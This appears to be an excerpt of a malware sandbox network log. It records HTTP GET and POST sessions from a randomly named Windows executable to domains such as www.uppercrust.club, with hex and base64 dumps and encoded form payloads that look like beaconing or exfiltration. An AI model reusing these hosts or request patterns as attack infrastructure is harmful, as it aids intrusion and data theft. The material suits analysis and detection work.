                                                                                                Data Ascii: X97yQePp7G7sIdBXj2jhbBX7FhAZxRTkVHhGteNnwM/GLDES51nMIddBWKvyB6ysG/BaupRbeKBTdFac+nCHIFVrhtOTwhK1lF8SFKZfInOmxZCt4GeZgXG3UQA5euxYnBRyoXtG7FyEe+1dwod4USBc+/7WXXunGT+EeBmPqKANUsAGh3ZDHCWyeR+cw/uNxOguhi2BIQjeAhN3TNGE5fwJH6kaYvoPeRfIGriuyF07Y31pyob
                                                                                                Nov 11, 2024 17:03:55.721596956 CET1289INHTTP/1.1 404 Not Found
                                                                                                Server: Tengine
                                                                                                Date: Mon, 11 Nov 2024 16:03:55 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Content-Length: 58288
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                ETag: "6729ca88-e3b0"
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                Nov 11, 2024 17:03:55.721606016 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                Nov 11, 2024 17:03:55.721613884 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                Nov 11, 2024 17:03:55.721625090 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                Nov 11, 2024 17:03:55.721638918 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                                Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                Nov 11, 2024 17:03:55.721646070 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                Nov 11, 2024 17:03:55.721652031 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                48192.168.11.204979543.156.106.109807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:56.792992115 CET499OUTGET /b38f/?Lr3=uHMLTHRPCpsdapr&IBQP=bEFn1h4TP97N18vCV7hUSjQIw4xMCEiPOnxtd8TYUawWIUuQfEmQCzCpa8YGfjn2jzwpUjFtNFjvXW/GU7b/pArgs0VIIQFXbRT3NlDEhxKin43O/dcn81w= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.155n8etsy.autos
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:03:57.210907936 CET1289INHTTP/1.1 404 Not Found
                                                                                                Server: Tengine
                                                                                                Date: Mon, 11 Nov 2024 16:03:57 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Content-Length: 58288
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                ETag: "6729ca88-e3b0"
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                Nov 11, 2024 17:03:57.210918903 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                Nov 11, 2024 17:03:57.211014986 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                Nov 11, 2024 17:03:57.211024046 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                Nov 11, 2024 17:03:57.211033106 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                                Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                Nov 11, 2024 17:03:57.211117983 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                Nov 11, 2024 17:03:57.211126089 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                Nov 11, 2024 17:03:57.211133957 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                                Nov 11, 2024 17:03:57.211142063 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                                Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                                Nov 11, 2024 17:03:57.242417097 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                                Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp
                                                                                                Nov 11, 2024 17:03:57.583259106 CET1289INData Raw: 45 47 68 32 32 4a 36 2f 71 6b 74 4b 52 32 52 62 32 61 57 77 66 2b 69 42 30 4e 41 6a 76 32 37 44 62 7a 42 62 46 75 61 7a 55 6d 55 73 64 6c 69 53 4a 68 32 45 6a 4c 63 55 69 57 54 39 59 64 32 62 68 34 50 69 2b 30 51 4d 59 32 48 4b 6c 37 58 4a 45 74
                                                                                                Data Ascii: EGh22J6/qktKR2Rb2aWwf+iB0NAjv27DbzBbFuazUmUsdliSJh2EjLcUiWT9Yd2bh4Pi+0QMY2HKl7XJEtcp5+UcvP7N31rQj21ZU9yvVmEA7HOxea8jqpz0cvK44XIOCrHSzVQy7mrmGPz9uy9XS2sF3wHEGkKIP3z4WFfufVrR0A8a831chj4DlitoMVZGLzgB+AJEPiMIJWMsTt+Hw7R+8wVgrBW0fw2MMGDUY9Y0hr1W968


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                49192.168.11.20497963.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:04:03.232256889 CET765OUTPOST /p1mo/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.uppercrust.club
                                                                                                Origin: http://www.uppercrust.club
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.uppercrust.club/p1mo/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 31 79 75 54 78 6b 49 30 66 73 69 31 74 4e 49 30 44 52 68 54 39 4f 57 55 52 5a 49 73 52 52 33 4e 76 56 59 6a 4d 30 68 49 48 46 47 38 62 4f 42 54 31 6e 47 6c 56 51 6f 55 33 4f 42 57 36 65 31 35 42 32 37 66 48 59 2b 6a 33 44 35 4a 2f 55 32 4a 41 74 4a 50 43 6b 31 36 43 44 35 6c 51 79 6d 2f 76 34 4d 33 44 70 69 66 4b 36 6d 4b 46 43 75 6d 63 73 6e 36 75 73 48 52 79 74 34 78 30 65 54 34 49 6e 71 57 51 46 71 6f 55 61 75 56 65 6c 41 37 36 39 4a 33 75 73 6d 2b 52 64 41 68 46 77 70 4e 69 64 30 7a 6c 31 48 35 61 57 39 35 34 43 4e 72 55 61 57 6e 61 34 57 37 75 36 30 6f 57 75 52 2f 54 67 3d 3d
                                                                                                Data Ascii: IBQP=1yuTxkI0fsi1tNI0DRhT9OWURZIsRR3NvVYjM0hIHFG8bOBT1nGlVQoU3OBW6e15B27fHY+j3D5J/U2JAtJPCk16CD5lQym/v4M3DpifK6mKFCumcsn6usHRyt4x0eT4InqWQFqoUauVelA769J3usm+RdAhFwpNid0zl1H5aW954CNrUaWna4W7u60oWuR/Tg==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                50192.168.11.20497973.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:04:05.900044918 CET785OUTPOST /p1mo/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.uppercrust.club
                                                                                                Origin: http://www.uppercrust.club
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.uppercrust.club/p1mo/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 31 79 75 54 78 6b 49 30 66 73 69 31 2f 2b 51 30 41 32 4e 54 38 75 57 56 65 35 49 73 62 78 33 4a 76 56 55 6a 4d 31 6c 6d 48 33 79 38 61 71 4e 54 79 6d 47 6c 53 51 6f 55 2f 75 42 58 30 2b 31 49 42 32 32 71 48 63 32 6a 33 44 74 4a 2f 56 47 4a 44 61 39 4d 41 30 30 63 4c 6a 35 37 65 53 6d 2f 76 34 4d 33 44 70 66 36 4b 36 75 4b 46 53 2b 6d 65 49 7a 39 77 38 48 51 6c 64 34 78 69 75 54 38 49 6e 71 6f 51 41 57 57 55 59 57 56 65 6c 77 37 30 4a 39 30 33 63 6e 37 63 39 42 51 42 42 35 4a 74 76 63 45 69 69 65 6b 63 54 78 42 77 30 41 78 4a 6f 69 44 5a 72 4b 4a 71 4b 4e 41 55 73 51 6b 4f 6b 54 64 79 7a 6e 31 57 78 4b 53 6d 36 46 2f 50 74 50 6a 74 51 38 3d
                                                                                                Data Ascii: IBQP=1yuTxkI0fsi1/+Q0A2NT8uWVe5Isbx3JvVUjM1lmH3y8aqNTymGlSQoU/uBX0+1IB22qHc2j3DtJ/VGJDa9MA00cLj57eSm/v4M3Dpf6K6uKFS+meIz9w8HQld4xiuT8InqoQAWWUYWVelw70J903cn7c9BQBB5JtvcEiiekcTxBw0AxJoiDZrKJqKNAUsQkOkTdyzn1WxKSm6F/PtPjtQ8=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                51192.168.11.20497983.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:04:08.571146965 CET2578OUTPOST /p1mo/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.uppercrust.club
                                                                                                Origin: http://www.uppercrust.club
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.uppercrust.club/p1mo/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 31 79 75 54 78 6b 49 30 66 73 69 31 2f 2b 51 30 41 32 4e 54 38 75 57 56 65 35 49 73 62 78 33 4a 76 56 55 6a 4d 31 6c 6d 48 33 4b 38 62 5a 46 54 30 46 2b 6c 54 51 6f 55 78 4f 42 4b 30 2b 31 76 42 32 75 6d 48 63 36 64 33 41 56 4a 2f 7a 79 4a 58 2b 68 4d 61 6b 30 63 55 7a 35 36 51 79 6e 37 76 34 63 72 44 70 76 36 4b 36 75 4b 46 51 32 6d 61 63 6e 39 79 38 48 52 79 74 34 39 30 65 54 59 49 6a 47 6e 51 42 47 47 55 4a 32 56 5a 46 67 37 35 61 56 30 2f 63 6e 31 53 64 42 49 42 42 30 58 74 75 77 75 69 6d 58 78 63 55 56 42 30 51 64 70 56 37 79 68 46 4b 43 68 67 37 68 5a 64 2f 78 7a 4f 55 4c 67 79 41 44 69 59 6b 36 61 6e 35 5a 4c 55 4d 48 36 75 6d 39 39 77 76 76 2f 59 52 78 51 62 41 70 75 55 30 44 4e 57 79 49 42 46 35 58 5a 53 64 6b 32 62 38 33 67 66 5a 50 59 6d 76 69 36 66 4c 49 45 52 56 61 39 36 4d 2b 38 48 32 43 37 43 5a 42 43 6d 7a 65 79 7a 68 45 6c 4f 39 61 48 5a 68 70 2f 76 79 66 79 67 38 79 6f 73 38 45 78 36 36 70 35 56 65 6c 51 2f 33 6f 52 45 79 77 54 43 6d 47 61 6c 71 4a 5a 7a 57 36 4a 2b [TRUNCATED]
